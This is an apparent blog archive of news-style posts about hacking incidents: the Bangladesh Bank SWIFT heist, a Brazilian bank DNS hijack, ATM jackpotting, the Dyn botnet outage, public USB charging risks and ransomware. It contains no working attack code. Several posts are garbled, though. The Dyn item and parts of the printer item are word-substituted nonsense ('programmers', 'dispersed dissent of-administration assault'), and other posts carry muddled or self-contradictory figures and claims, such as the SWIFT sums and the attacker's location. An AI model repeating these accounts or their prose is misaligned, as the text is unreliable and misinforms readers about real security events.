Showing posts with label hackers. Show all posts
Showing posts with label hackers. Show all posts

Monday, 16 October 2017

SWIFT Says Hackers Still Targeting Bank Messaging System

The $81 million heist that was carried out from the Bangladesh Bank in February was done by attackers who hacked into the bank’s SWIFT software. They were able to steal the money by hacking into the software to transfer the money. The attackers were also able to cover up their tracks in a very effective manner.

The attacker, based in Bangladesh, was able to develop a malware which was highly sophisticated and could interact with the local SWIFT software in his vicinity.

SWIFT is a cooperative of 3,000 organizations, based in Belgium. It provides a platform to transfer funds internationally. SWIFT is in the know, that there exists a malware that can reduce the financial institutions systems abilities that can cause various fraudulent transactions on their local systems. They are however saying that this malware is not capable of hacking into their network or causing extreme damage as far as their messaging services are concerned. This is contrary to the reports, which suggest otherwise.

In case of any hacking to the SWIFT software can cause transfer of funds from the victim’s account to the attackers account. As seen in the Bangladesh Bank case, there were 30 SWIFT transactions on FEB 5th, for a withdrawal of $ 1 billion from the US Federal Reserve in New York using the SWIFT bank code. Only $ 81 million could be transferred and the balance $ 6.9 million was still retrievable.

The malware used in the Bangladesh Bank SWIFT software was specially designed with a complete know how of the SWIFT Alliance Access software and excellent malware coding abilities.

The malware used by the attacker was not only used to change the SWIFT transactions, but also to hide any of the changes made, since all the transfers that take place are sent by the SWIFT’s software to a printer. When the transactions are printed out, the officials of banking sector can notice any fraudulent transactions and take action immediately. They can thus prevent any malafide transactions from taking place. The malware used in this case intercepted the SWIFT messages and the altered manipulated copies of such messages were printed. In this way they were able to cover up their fraudulent transactions. The malware used, seems to be a wider attack toolkit, allowing the attacker to send forged instructions for payment and also cover up his tracks. This gave the attacker ample amount of time to carry out the transactions and enabling multiple transactions without being detected.

SWIFT is coming out with a software to counteract such related attacks, including alteration in the database records. The customers on their part are encouraged to keep all their IT systems up to date in order to prevent the attackers from hacking into any loopholes in their local security systems.

A spokesperson has advised their customers to keep an eye on any anomalies seen in their local database records whereby helping the customers to keep their accounts secure. The most vital is to adopt adequate security measures and safeguard their systems.

The authorities warn that the malware and the various related tools can be a threat for SWIFT customers. They can be configured easily and likely to cause similar attacks in future. A worrying aspect is how the attackers sent these transactions, the malware used in the systems and who are the people behind this scam.

Thursday, 14 September 2017

The Great Tech Panic: What You Should Worry About?

Tech Panic – Cause for Worry 

Technology has been making great progress in transforming our lives which has given rise to panic. Experts have been weighing on how much one should be stressed with regards to self-driving cars, malevolent AI etc.

 In cities like San Francisco; Boston, Tempe, Arizona where self-driving cars have been verified on public roads, there have been trained engineers on board to ensure that the emerging tech does not take on the pedestrians. Nidhi Kalra, co-director of the RAND Centre for Decision Making Under Uncertainty, had commented that it is that persons’ task of paying attention to what the vehicle seems to be doing.

As per the most optimistic estimates of experts, fully autonomous cars on the public roads seems to be at least three years away and that technology will never be infallible, people would still die in car crashes.

However, eventually, self-driving vehicles would probably save lives according to Mark Rosekind, chief safety innovation office at Robotaxi start-up Zoox as well as the former head of the National Highway Traffic Safety Administration, and 94% of the crashes are credited to human mistake.

Would hackers leak my emails? 

To gain access of one’s email is not at all tough. We find phishers who seems to get more refined from the increased power of ransomware attack encountered.

Seth Schoen, senior staff technologist at the Electronic Frontier foundation commented that `a cleverly composed email which states `I’m your tech support person and need to know your password’, still tends to function as a shocking percentage of the time.

When it comes to leaking those emails, the threat to the average person is quite insignificant and attacks like the DNC leaks, the Panama Papers together with the Macron campaign hack could encourage your sense of paranoia, unless you are a Kardashian or a Trump, your personal correspondence is likely to be of little interest to cyber thieves’.

Are We Prepared for Cyberwar?

Former US counterterrorism Czar Richard Clarke in his 2010 book had ranked on how well some countries tend to fare in a digital conflict As per his formula, the US had been placed dead last and on top – North Korea.

Clarke had figured that the US and Russia could have the best offensive hacking capabilities in the world. However, North Korea seemed to have a bigger advantage - absence of digital dependence. The solitary kingdom’s hackers tend to indulge in a scorched-earth cyberwar without risking much since its citizen tends to stay disconnected.

The US on the other hand is in need of the internet than its opponents. Hence Clarke found America more susceptible to what he termed `the next threat to national security’. Seven years thereafter we need to quit worrying that the period of cyberwar is approaching and we need to admit the fact that the digital attacks on infrastructure are unavoidable.

On the contrary we need to focus on how we should recover from them. This would mean bringing down our reliance on digital systems and enhance on maintaining our consistent, out-dated, analog systems, in order that we can fall back on them when digital disaster occurs.

Essential to Hold On to Era of Physical Override 

When a team of hackers had blacked dozens of electrical substations in Ukraine, in 2015, the utility companies had the technician equipped to switch the power back manually, within a period of six hours.

They had been alert since the Soviet-era grid of Ukraine seems to be stiff on a normal day. The modern, highly automated grids of America do not tend to break often. US institutions should develop the readiness of Ukrainian-style, in an event of a grid attack. In case of interference, it is essential for voting machines to have auditable paper ballots as a backup.

 Organisations of all types should be kept updated, offline data backups for speedy recovery when cyber-attacks like the global WannaCry ransomware outburst. There is no need to relinquish on hyper-connected infrastructure though it is essential to hold on to the era of physical override – since when hackers tend to hijack the elevator of your high-rise apartment, one can be glad that the stairs was another option to resolve the issue.

Would Hackers Launch Nuclear Weapons?

Senior researcher at RAND, Bruce Bennett who seems to specialize in counter proliferation and risk management had stated that `in spite of the act flicks imagining that very scenario, it seems highly improbable. Nuclear weapon does not seem to be connected to the internet, making it complex for anyone to hack them.

On the contrary such weapons seems to be organized by standalone computers together with code keys that are distributed by human couriers, which is a method developed and maintained precisely with security in mind according to an aerospace engineer and analyst John Schilling, for 38 North a Korea-focused analysis group.

He informed that there could be a possibility of sabotaging a nuclear bomb by hacking its secondary as well as tertiary guidance system, which is a tactic the US could have utilised on the missiles of North Korea, though there seems little chance that the troublemaker agents could launch bombs.

Would AI Turn Against Humans? 

Paul Christiano, a researcher at the non-profit Open Ai had mentioned that AI ultimately would be capable of directing science experiments executing construction projects as well as develop more AI without human involvement. He together with his colleagues does not seem to worry that the evil robots would destroy us someday.

 Engineers at Google’s DeepMind unit and Oxford’s Future of Humanity Institute however are collaborating in understanding which kind of AI systems could take actions in reducing the chance of being turned off. Their concern lies in the fact that as AI tends to progress beyond human understanding, the behaviour of the technology may deviate from our intended goals. Hence it is up to the researchers to construct a foundation which tends to have human values at heart.

Am I Being Spied on Through my Microphone – Equipped Device? 

Third-party developers, cyber-criminals and at times also the companies which tend to develop smart devices could have the means of accessing your audio stream. Mordechai Guri, head of R&D for Cyber Security Research Centre at Ben-Gurion University in Israel had stated that they are always accompanied by high-quality microphones and your smartphone or smart TV can be turned into a spying device for advertising purposes.

It is also the same in the case of smart home devices such as Amazon Echo and Google Home with far-field always-on microphones. Furthermore apps are probing to access smartphone microphone in order to feed on hyper-targeted ads.

Saturday, 9 September 2017

Catching the Hackers While They Act

Catching the Hackers
How investigators trying to catch hackers work

The role of the computer expert becomes increasingly relevant to the proliferation. Nowadays, the attacks such as phishing or data hacking for ransomware purposes are the main issues. Hence, these specialists perform a thorough analysis on the affected devices to solve the issues. And also they obtain the digital evidence to get it right.
While hackers try not to leave traces, their footprints are not so easy to erase. That is why their job is to shed light on the hacking. This can be done by the reconstruction of the activity of the electronic device that has been used by the hackers. This is explained by Telam Maximiliano Bendinelli, the computer forensic expert.
A specialist works with Pablo Rodríguez Romeo in the CySI, said that last year they received a large number of queries from companies about the attack.

Virtual Hijacking of Data

Bendinelli cited virtual hacking of data for extortionate purposes known as ransomware. The hacking of data stored in a technological device to be later released in exchange for a ransom.

With their experience in the cases, the experts dealt with in the study. They found that the cost for the release of the data usually ranges from the US $ 300 to the US $ 1,500, always in Bitcoins.

These experts found sometimes interesting turns in the case of ransomware. They could even solve the situation without paying the hackers.

The hackers trick the users with some fraudulent methods that intend to direct them to some other page. If the user gets into to the page, paves the way to download some malicious codes into their computer for hacking their data.

Some reputed banks are also victims of these attacks, but they don't want to expose it. Rather, they get the experts' consultation to solve the issues.

The intervention of the computer expert becomes crucial in the field. They carry out the corresponding analysis, obtain and safeguard the digital evidence of the users. And also to implement the necessary methods to avoid invalidating the test.

The investigation of the issues arises from an audit, working with those who might be involved. And also identifying the correlation of facts and equipment.

The victims or the users never work with the original evidence. Because the users run the risk of damaging it. Hence, they proceed to preserve the evidence from a forensic copy.

The Forensic copy helps to identify the hacker


The forensic copy allows recovering all the information on the disk. Even the deleted, and also rebuilding the hacker's steps on the computer.
Currently, it is very common to use the forensic investigation software. It allows the analysis and processing of a lot of information with unmatched speed. This kind of software showed very good results. It makes technology a top-quality alternative to the old forensic computer applications.

The specialists summarized the work of the computer expert as a researcher and consultant. This is to carry out the processes, using the benefits offered by the research software and the management of various analytical tools to find hackers. This allows the identification of relevant data and cross-referencing of fundamental information.

Wednesday, 2 August 2017

How Hackers Hijacked a Bank’s Entire Online Operation

Hackers

Extraordinary Incident of Wholesale Bank Fraud Done by Hackers


Hacking a bank is not different from the out-dated means of raiding it and hackers can get in and out with the goods quite easily. However a particular enterprising team of hackers aiming a Brazilian bank seemed to take a much more inclusive and a scheming method of operation.

On a certain weekend afternoon, they had rerouted all the online customers of the bank to effortlessly reconstructed fakes of the bank’s properties wherein the marks offered over their information of the accounts. The researchers at Kapersky the security firm had defined an extraordinary incident of wholesale bank fraud, which had basically hijacked the complete internet footprint of the bank.

 Last year, on October 22 at 1 pm, the researchers had stated that the hackers had altered the Domain Name System registration of all 36 online properties of the bank, taking the desktop and mobile website domains of the bank to take users to phishing site. That meant that the hackers had the potential of stealing login credentials at the sites which had been hosted at the legitimate web addresses of the bank.

The researchers of Kaspersky were of the belief that the hackers could have also simultaneously redirected most of the transactions at ATMs or point-of-sale systems to their own servers, gathering the details of the credit card of anyone who utilised their card on that Saturday afternoon.

Malware Infecting Customers


One of the researchers of Kaspersky, Dmitry Bestuzhey, who had analysed that attack in real time on seeing malware infecting customers from what seemed to be the fully valid domain of the bank, had stated that absolutely all of the bank’s online operations had been under the control of the attackers for five to six hours.

From the point of view from the hackers, according to Bestuzhey, the DNS attack meant that `you become the bank and everything belongs to you now’. Kaspersky has not revealed the name of the bank which had been targeted in the DNS redirect attack. He has stated that it seems to be a major Brazilian financial company with hundreds of branches, operations in the US and the Cayman Islands, with 5 million customers and over $27 billion in assets.

Though Kaspersky is not aware of the full extent of the damage caused due to the takeover, it should be a warning to banks all over to consider how the insecurity of their DNS would support a nightmarish loss of control of their core digital assets. Bestuzhev had commented that they have never seen it exploited in the wild on such a big scale.

DNS – Vital Decorum Under Cover of Internet


The Domain Name System – DNS tends to serve as a vital decorum running under the cover of the internet and translates domain names in alphanumeric characters such as Google.com, to the IP addresses such as 74.125.236.195, which tends to represent the definite locations of the computers hosting websites or other services related on those machines.

 However attacking the records could take the sites down or redirect them to a destination of a hackers’ choice. For instance, in 2013, the Syrian electronic Army groups of hacker had changed the DNS registration of The New York Times in redirecting visitors to a page with their logo. Recently, the Mirai Botnet attack on the DNS provider Dyn had cracked a main portion of the web offline inclusive of Amazon, Reddit and Twitter.

However the attackers of Brazilian bank had subjugated their victim’s DNS in a much more directed and profit-driven manner. Kaspersky was of the belief that the hackers compromised the account of the bank at Registro.br which is the domain registration service of NIC.br, the registrar for the sites ending in the Brazilian .br top-level domain which is said that it also manages the DNS for the bank.

Changing Registrar – Domains of Bank


The researchers are of the opinion that with that access, the hackers had been capable of changing the registrar at the same time for all the domains of the bank, redirecting them to servers which the attackers had set up on the Cloud Platform of Google.

With the hijacking of the domain, those visiting the website URL of the bank were redirected to the duplicate sites where those sites also had valid HTTPS certificates issued in the name of the bank. Hence those visitors’ browsers portrayed a green lock together with the name of the bank like they would in the real sites. Kaspersky also observed that the certificates was provided six months earlier by Let’s Encrypt, the non-profit certificate authority which makes obtaining an HTTPS certificate easy in case of increasing HTTPS acceptance.

 Josh Aas, founder of Let’s Encrypt had stated that `if an entity had gained control of DNS and had gained effective control over a domain, there could be a possibility for that entity to get a certificate from them. Such issuance would not constitute mis-issuance on their part since the entity receiving the certificate would have been able to properly demonstrate control over the domain’.

Hoaxed Sites Infected with Malware


Eventually the hijack had been so thorough that the bank was unable to even send email. Bestuzhev stated that they could not even communicate with the customers to send them an alert and if your DNS is in control of the cybercriminals, you are basically screwed’. Besides phishing, the hoaxed sites also infected victims with malware download which had disguised itself as an update to the Trusteer browser security plug-in which the Brazilian bank provided the customers.

As per the analysis of Kaspersky the malware gathers not only banking logins from the Brazilian banks but also eight others as well as email and FTP credentials together with contact lists from Outlook and Exchange. All of these had gone to command-and-control server hosted in Canada. The Trojan also comprised of an operation intended to disable antivirus software for infected victim, and could have persisted much beyond the five hour window when the attack had taken place.

The malware had scraps of Portuguese language, implying that the attackers could have been Brazilian. Bestuzhev of Kaspersky debates that for the banks the incident could have been a clear warning to check on the security of their DNS. He notes that half of the top 20 banks ranked by total assets do not manage their DNS but tend to leave it in the hands of a potentially hackable third party and irrespective of who tends to control the DNS of a bank they can take special precautions in preventing their DNS registrations from being changed without safety checks such as `registry lock’, which some registrars tend to provide together with two-factor authentication making it difficult for hackers to change them.

Tuesday, 28 February 2017

Stop Charging Your Phone in Public Ports

charger
Credit:Selena Larson, CNN
As the time period of smartphones increases, its battery begins to retard. First 1 year is very enjoyable; when you are just required to charge your phone only once a day and get all the privileges all throughout of the day. In the beginning the battery even stays for two consecutive days if you do not use your phone very frequently, but as time passes you get to experience a huge lot of problems related to your phone, especially your battery.

It generally happens that when you forget to charge your phone completely, that very day you end up with an emergency when your battery runs out and you are forced to take the help of some unknown source to charge your phone, but this alternative can turn out to be very risky. Recent discoveries have been made where a different kind of scamming was discovered. The public plug-ins that are available on roads, railway stations or hospitals can turn out to be your major enemy in lieu of the benefit of charging.

The hackers are inflicting this public USB ports with some hacking device, which as soon as you connect your mobile with these ports in order to get the battery charged immediately all your information gets copied on the other side. In this world of digitalization, cashless society, paytm, mobicash all your data are mainly saved on your phone because with the help of your smartphones you avail these benefits and the data remain on your phone.
You know that this datas includes all your personal details related to your bank account details and if any scammer gets hold of it you will feel to get penalized without any mistake of yours. Just your casualty will force you to face several consequences.

This whole process involves many technicalities where as you plug in your phone into an unreliable source, your device gets infected, just like your phone gets inflicted by virus when you unknowingly visit unauthorized sites. In this case also the problem is the same by connecting your phone into a public outlet your data gets compromised.

Drew Paik who belongs to a security firm known as authentic8. This Authentic8 develops Silo, which is a high defined security browser that safeguards all the activities related to web.

Remember, the cord that you use to charge your phone is also used to share data from one phone to another. So, you can well imagine that when you plug in the cord to an infected socket what can the consequences be. If the port is truly hacked by the hackers then you cannot even imagine that to what extent they can draw your data.

The easiest way to charge your phone will turn out to be the biggest mistake of your life. So, never connect your phones to this public ports this can lead to serious consequences; you might have to face such problems that you didn’t expect to come across ever in your life.

Monday, 9 January 2017

Code Associated with Russia Hacking Found on Vermont Utility Computer

Russia Hacking
Hacking of the Russian campaign which dubbed Grizzly Steppe was discovered by the Obama administration and they found that the code associated with the hacking was found on a laptop that was associated to a Vermont electric utility computer but was not connected with the grid.

The Burlington Electric Department said that they took immediate measures in figuring out the laptop by issuing alerts everywhere for its detection. They even assured that their officials are working over it to stop any further infiltration of the utility system by tracing the malware.

The Burlington Electric Department said, that the Department of Homeland Security have discovered a malicious code in Grizzly Steppe, which needs to be decoded. After this discovery they without wasting any time scanned all the computers in their system to locate the malicious software. The infected code was figured out in one of the Laptop which was of Burlington Electric Department and wasn’t connected to the organization’s grid system.

The detected malicious code was intended to have resulted from a comparatively less hazardous episode, due to visiting a website related to certain queries or questions. One of the team working with the concerned problem said that the Russian hackers might not have been involved directly in this case. The exact date of the incident is yet to be detected.

President Barack Obama issued an order where he expelled 35 Russian spies and passed ordinance on two Intelligence Agencies of Russia regarding their involvement in hacking U.S political parties in the election of 2016 presidential chair.

A declaration was passed after the Washington post where it was reported that the hackers of Russia infiltrated a Vermont utility. The government and the officials of utility industry judiciously monitored the nation’s electrical grid on a regular basis because it is all immensely computerized and any malfunctioning might lead to severe disruptions in the functioning of services related to any emergency or medical aid.

One of the senior most official of the administrative department under President Obama declared that all defenders of several networks based in United States can defend themselves against the unauthorized activity related to cyber crime by Russia.

No immediate response towards the request was answered by the Department of Homeland Security. The officials investigating with the case considered the incident as a minor one that on the long run did not lead to any disastrous results. But still they are alert and extremely critical regarding any disturbances that might occur by the disgraced action of the Russians in the field of cyber activities.

The officials have become entirely serious and have kept a strict watch eye on the Russians to avoid further malicious implications from their end. They have traced the infiltrated code and has successfully managed to bring it under control by taking in much advanced technologies and government aided campaigns in the space of cyber crime.

On a positive note Russia is justly held responsible by the U.S. officials for enabling them to develop such a highly intensive security measures to restrict any further hacking

Friday, 23 December 2016

Hackers Could Take Control of a Plane Using In-Flight Entertainment System


hacking
A major vulnerability has been found in the in-flight entertainment system which can be worked upon by the hackers to take control over the aircraft. The vulnerable in-flight entertainment systems were mainly found in some of the major airlines which include Virgin, Emirates and Qatar. The security hole has been effectively found in the Panasonics branded Avionics which is a in-flight system used in planes across 13 major airlines in the world. This would result in not just taking cover the flight but it will result in leaking passengers’ information. However Panasonic has simply denied any possibility of inflicting damage or causing safety alerts with its in-flight systems.

A reputed researcher sheds light on the vulnerability

A researcher named Ruben Santamarta stated that the vulnerability found in the in-flight entertainment system is a grave concern for the safety of craft and the passengers alike. He further elaborated that hijacking the in-flight system which lends the ability to the hackers to make changes in the critical information related to the altitude and location.

They can even control the cabin lightening and along with possibility of hacking into the announcement system. When all these factors are taken into the question then it will result in a paranoid and hugely unsettling experience for the passenger. In short whether the hackers indulge in driving the aircraft haywire or not but it will certainly end in a traumatic journey for the passengers.

A possible loss of financial details is also under play if a hacker gets into the flight system. They will be able to do away with the credit card details of the frequent fliers which are stored in the automatic payment system. Depending on the security level imposed on the aircraft system hackers might get access to the aircraft’s controls which are an area of huge concern.

How much damage can be inflicted on the plane? 

The real extent of damage which can be inflicted on the plane by making use of this vulnerability to dependent on the security designed for the craft. The more the internal systems are isolated from one another the lesser will be the damage. If passenger entertainment system isn’t connected with aircraft control or passenger device then the damage will be limited but it isn’t the case always.

Rube therefore offers a piece of advice as well as warning to the airlines to remain vigilant with the behavior of their in-flight systems and ensure that it remains aloof from the critical aircraft’s control. Panasonic was alerted in 2015 about the vulnerabilities in its in-flight aircraft system in Mach 2015 by IOActive.

This means Panasonics had enough time to fix all the problems associated with its in-flight but Panasonic failed to do so which allowed IOActive to public with the information about vulnerability. Panasonics has defended itself by releasing a statement where it maintained that the information offered by IOActive is inaccurate and misleading and based on ‘theoretical’ assumption.

Friday, 25 November 2016

Malware is Making ATMs 'Spit Cash'


atm
We all know our ATM passwords and have vowed to carry this little secret to our grave because that is sufficient to keep our money safe. What if multiple people withdraw money from your account from several ATM machines even after not knowing your password? No, I’m not talking about a video game. You may now curse the genius hackers, but all of these things are now possible in real life.

Recently, a cyber security firm from Russia has warned about a series of coordinated hacks on the ATM machines. The centralized system of the bank was hacked thereby leading to disgorge of money from several ATMs without the instant knowledge of the bank officials and the account holders.

THE HACKER HITS THE JACKPOT

The activity is conducted by using a program dubbed by Cobalt, an infamous hacker group, to gain access to the bank accounts and in turn, the ATMs. The process has been named “touchless jackpotting”. The machines are not physically tampered with. This is done by penetrating a testing tool into the bank computers and then infecting them with malicious emails for accessing ATM controller servers. All that some accomplice has to wait in the appropriate ATM booth at the right time to collect the money oozing out of the ATM machine.

THE SMART BANK ROBBERS

In earlier days, the hardware based method of robbing where the card information was stolen, was more common. The new method that includes hacking is however much more dangerous because it is actually a smart way to rob a bank, where groups of ATMs are infected simultaneously. So, this method brings twice the money than the old way could, into the sinner’s pockets, that too in a shorter time and with lesser chances of going behind the bars.

TRACE THE MONEY

The key to solving any financial hacking is following the money. However, this is very difficult in this method because the money is collected in person from different ATM booths. The information of the hack is known only after the money has been withdrawn from the ATMs. Even if the cybercrime police hold links to gain information about Cobalt, they can hardly ever get fortunate enough to turn up at the specific location on the specific time. Moreover, the money mules often do not know the hackers as the hackers may not have met them in person .So even if they get caught; it is very difficult to catch the masterminds behind the entire play.

CAN THE MONEY BE SAFE AGAIN? 

The Cobalt group might have joined hands with other big groups of hackers like Buhtrap to raid the ATMs of 14 countries so far, that includes Poland, Spain, Britain, Russia, Romania and Netherlands.

The banks can place their ATM machines under the full view of a security camera and with security personnel at the doorstep so that the money mules can be caught easily. The bank employees must be trained to look for any suspicious threats.

Till then, all you can do is protect your ATM password!

Tuesday, 1 November 2016

If the US Hacks Russia for Revenge, That Could Lead to Cyberwar


CIA
After Russia took claim of a recent upon the US government in the cyber field CIA wishes to send a message back by indulging in similar response. Russian hackers brought massive cyber attacks upon the US and try to bring huge interference during the US election through state sponsorship. CIA has a plan to bring the offensive back to the Russian by launching similar attacks which will only help worsening the relationship between the two countries.

Just last week a report was released by NBC News where it was specifically stated that CIA is actively working on the blueprints to launch one of the most covert cyber operation against Russia in near future. Few experts has suggested that CIA would be working towards leaking the letters and documents related to Vladimir in the similar fashion as Russians has released the documents related to the Clinton campaign and the Democratic National Committee.

Documents collected to be utilized during cyber attack

Retired security personnel has stated that over the years CIA has accumulated a wide number of documents and filed which can create trouble for the Russian and most importantly for Vladimir Putin. These documents basically deal with notorious dealing of the Putin and his associates in the last decade and beyond.

Ex-NSA Chief Michael Hayden has even went ahead to say that hacking foreign governments as well as political happens to be the past time of the CIA. Currently the relationship and atmosphere surrounding these two countries has become quite similar to the Cold War era but instead of a nuclear war threat of an impending cyber war looms in the air. Obama is going out of the office in November but even that has not stopped him from criticizing Putin in this regard.

It might even happen that all these theories about CIA possessing a truckload of information on Putin is simply a story to scare off Russians from causing anymore undue damage in the cyber field. If CIA plans are real then how useful will it be against Russia is yet to be asserted. A number of security experts has stated simply releasing damaging documents against Putin will not have any impact among the Russian government though his image might take a hit globally but nothing worthwhile can come out of it in the long run.

A warning for impending cyber war

US politicians are highly susceptible to the public pressure which can even spoil their future and political career if any documents are found against them. On other Putin isn’t much susceptible to such thing but Russian can utilize its highly robust internet surveillance plan to launch attack upon the US in the cyber field if it ever feel threatened then it will go on full-fledged cyber war against US.

The international paradigms changes just a few years ago the greatest threat to US cyber security was China. China has been accused of hacking into and tens of millions of US citizen’s security review files right from the US government online databases which tend to go decades back.

Wednesday, 26 October 2016

Hackers Used New Weapons to Disrupt Major Websites Across U.S.


map
Crucial sites were difficult to reach to individuals crosswise over wide swaths of the United States on Friday after an organization that oversees vital parts of the web's framework said it was under assault. Programmers unleashed a mind-boggling operation on the internet through some devices like webcams and computerized recorders and slice access to a portion of the world's best-known sites, a staggering rupture of worldwide web dependability. Clients reported sporadic issues achieving a few sites, including The New York Times, Spotify, Twitter, Reddit, Airbnb,Etsy, SoundCloud, and Netflix. The organization, Dyn, whose servers screen and reroute web activity, said it started encountering what security specialists called a dispersed dissent of-administration assault in the early morning.

Reports that numerous locales were blocked off began on the East Coast, however, spread westbound in three waves as the day wore on and into the night. Also, in an upsetting improvement, the assault seems to have depended on a huge number of web associated gadgets without their proprietors' knowledge — with programming that permits programmers to summon them to surge an objective with overpowering activity.

The assaults were not just more regular, they were greater and more advanced. The run of the mill assault dramatically increased in size. Besides, the aggressors were all the while utilizing diverse techniques to assault the organization's servers, making them harder to stop. The most successive targets were organizations that give web foundation administrations like Dyn.

The main cause and working of the gadgets-

Jason Read, the creator of the web execution checking firm CloudHarmony, possessed by Gartner Inc., said his organization followed a half-hour-long interruption early Friday influencing access to numerous destinations from the East Coast. Dyn is a New Hampshire-based supplier of administration for overseeing DNS, which goes about as switchboard associating web activity. Krebs, whose site was focused by a comparative assault in September, said the XiongMai gadgets are basically unfixable and will remain a threat to others unless they are completely expelled from the web.

These gadgets are thusly used to make a botnet, or robot system, to send a large number of messages that thumps the out casualties' PC frameworks. The source code for Mirai was discharged on the purported dull web, locales that work as a kind of online underground for programmers, toward the start of the month.

The assault comes during an era of increased open affectability and worry that the country's establishments and framework could confront huge scale hacking assaults. The latest illustration has been the arrival of messages stolen from the servers of the Democratic National Committee, which the USA knowledge sources say was the work of Russian Federation.

The theme has come up often amid the fall's hard-battled presidential crusade. The US Department of Homeland Security and Federal Bureau of Investigation both were mutually exploring the late blackout. Dyn authorities wouldn't affirm the figure amid a phone call later Friday with correspondents.

It is too soon to figure out who was behind the assaults, however, it is this kind of assault that has US authorities concerned. They are concerned that an assault could keep nationals from submitting votes.

Thursday, 6 October 2016

Have hackers turned my printer into an offensive weapon?



list
It was just last month that is in September one of the largest net attacks took place with pinpointed a renowned OVH a French hosting firm and a blogger. This single attack is believed to have comprised of over one trillion bits of data. Both of the hacking events marked a change in the methods used by hackers who survive by breaking into websites which hold widespread data add this form of attacks is known as Distributed Denial of Service attacks (DDoS). The data was sent to the targets through and other such "smart" devices which were hijacked by the hackers.

Can I tell if my webcam/DVR/printer is attacking someone? 

Well to be honest, not easily. If you are a medium of bombarding someone else, your internet speed may slow down however it may not be noticed at times of normal browsing while it may be evident when it comes to video or music streaming or games which will lag. For those who are tech savvy, they can make use of software’s which keep a tab on the flow of data packs on their home network, however this is not easy if you are unaware of what you are doing exactly.

Could I get in trouble for letting my webcam attack someone? 

In terms of legality, you can’t get into trouble with the police however it is believed through researches that a hacker can get into your internal network through a webcam hack and keep a tab on everything else. So in such a case you have an intruder which is best if gotten rid of by taking the necessary action.

Why are malicious hackers using these devices? 

That’s because it is way easier to hack in comparison to PCs or servers and these devices tend to make use of default passwords and fail to have any kind of security software in place. And to the benefit of the hackers, there are endless numbers that stay on all day long and it is a task to both update as well as secure. In modern days it is extremely easy for hackers, they are able to target vulnerable devices and put together an army of their own to create a botnet without having to rent hijacked machines like in the past.

What kind of devices are they scanning for? 

Web-associated cameras are especially prominent however outputs are likewise being completed for advanced TV recorders, home routers and printers. All these have a fundamental processor inside that can be subverted to pump out attack packets. Brian Krebs, the blogger who experienced an assault an IoT botnet, has ordered a rundown of gadgets known to have misused his webpage with information. Large portions of the login names and passwords for these gadgets are anything but difficult to-crack. On 1 October, source code for one IoT assault was freely shared, driving some to propose that numerous more malignant programmers will now begin checking for vulnerable gadgets. This guide made by security firm Symantec demonstrates where Europe's botnets are facilitated. Turkey is home to the vast majority of the commandeered devices and PCs.

How new are these types of attacks? 

The main DDoS assaults were seen on the web in 2000. The primary influx of information bombardments was gone for betting locales which were undermined with being thumped disconnected unless they paid an expense. The greater part of those coercion endeavors utilized commandeered PCs to send information. Presently the ascent of the Internet of Things that is populated with brilliant gadgets has commenced recharged enthusiasm for these sorts of assaults. Security scientists have cautioned about the perils of unreliable IoT gadgets for quite a while yet they are beginning to be utilized for critical assaults sooner than numerous individuals anticipated.

Tuesday, 22 March 2016

Chinese Hackers Behind U.S. Ransomware Attacks Security Firms

Hack

A group of four security firm investigating the cyber attacks on the U.S. based companies has found that most of the hackers make use of the same tactics and tools which were once associated with the Chinese government supported cyber attacks. Ransomware has become a major tool for unleashing the cyber attacks on the unsuspecting common users. Ransomware as the name suggests simply take over the control of the system and very carefully encrypts all the data stored on the system which leaves it inaccessible to the users. In order to get back the access users are required to a ransom of few Bitcoins.

Hackers tricks users into installing Ransomware

Security firms have stated that hackers use various complex and highly intelligent ways to spread ransomware by actively exploiting the vulnerabilities found in the application servers. Once vulnerability has been compromised hackers tricks users into installing ransomware on their devices. In one of the recent attacks more than 30% of the machines at transportation and a technology firm were infected with the ransomware.

The rise of ransomware over the years

Ransomeware aren’t something new as it has been in wide usage by the cyber criminals over a decade. In the beginning unsuspecting users were lured into downloading infected programs or antivirus suits which when installed happens to overtake the device and requires a ransom of certain amount in order to get back the access.

However in the recent years cyber criminals has got hand at the better encryption techniques which ensures that users wouldn’t be able to get access to their files without paying the ransom. Formatting the devices is a great way to do away with the ransomware but it comes at the cost of losing all the data associated with device. Ransomware payments are mainly made in the virtual currency Bitcoin which offers secrecy from governmental agencies and others.

‘Mind’ game behind ransom

Ransomware happens to be one of the most successful tools of the cyber criminals as a greater percentage of infected users end up in paying the modest ransom amount for their inaccessible data. Cyber criminals usually set a modest price as a ransom in order to give back the access to the users. Most of the victims are willing to pay this amount in order to get back their data and it also results in getting positive response in the online sphere. Assume a victim pays about 1 or 2 Bitcoin which amounts to $600 and he gets back the access to its data and he give a feedback on the online forums that he was relieved to get access to data finally after paying then ransom operators. In short all the other victims searching for this malady online will be more willing to pay on basis of this feedback.

On other hand security firms have warned victims that paying ransom will only end up in making cyber criminals much more ambitious. Very soon they will shift from asking ransoms of few Bitcoins to performing some complicated scams and credit card theft as well.

Thursday, 24 September 2015

How it takes just 15 minutes of web tuition for anyone to hack into your email

Smartphone

Email Account Hacking – Easier & Faster


According to latest study, email account hacking is easier and faster than expected and takes less than 15 minutes. A group of volunteers comprising of TV producer, a retiree, a self-employed baker managed to learn the technique of hacking into someone’s account within a span of about 15 minutes.

 The group with limited knowledge of technology followed online tutorial utilising a man in the middle concept to hack into a computer network to gain each other’s login information. The controlled classroom trial led by Life assistance company CPP Group Plc involved helpers with a 14 minute lesson made available freely online.

Through this they were capable of downloading hacking software which enabled them to gain access in login details as well as passwords for email accounts, online shopping accounts and social networking sites within a few minutes.

There seems to be more than 20,000 videos online, coaching users on how to hack social media profiles, email, PayPal accounts and smartphones and the internet’s potentials in hosting hacking tutorials seems to be unchallenged. It has been observed that over seven million people have been the victims of their online password protected information accessed without their permission

Government to Take a Stronger Stand on Online Hacking Tutorials


Many users have had their personal emails hacked with around 19% stating that their eBay accounts have also been hacked.Accounts of social media users were also not spared from being hacked too, with 16% informing that their social networking profiles had been tampered into and around 10% have had their money or a loan taken on their behalf. With the increase in several public Wi-Fi networks as well as smartphone with inbuilt Wi-Fi connections in the last few years have given rise to opportunities for hackers with this type of crime the capabilities which would tend to increase in due course of time.

Most of the people are aware that the online hacking tutorials prevail with several others agreeing that this type of coaching need not be made available to online users, which would be creating a lot of inconvenience to the victim and beneficial to the culprit.

More than half of the people desire that the governments should take timely action in eliminating these hacking tutorials from the internet. The CPP has been advising people to take necessary action in protecting themselves from these online hackers wherever possible and are also influencing the government to take a stronger stand on, online hacking tutorials.

Bring Awareness on Risks Involved


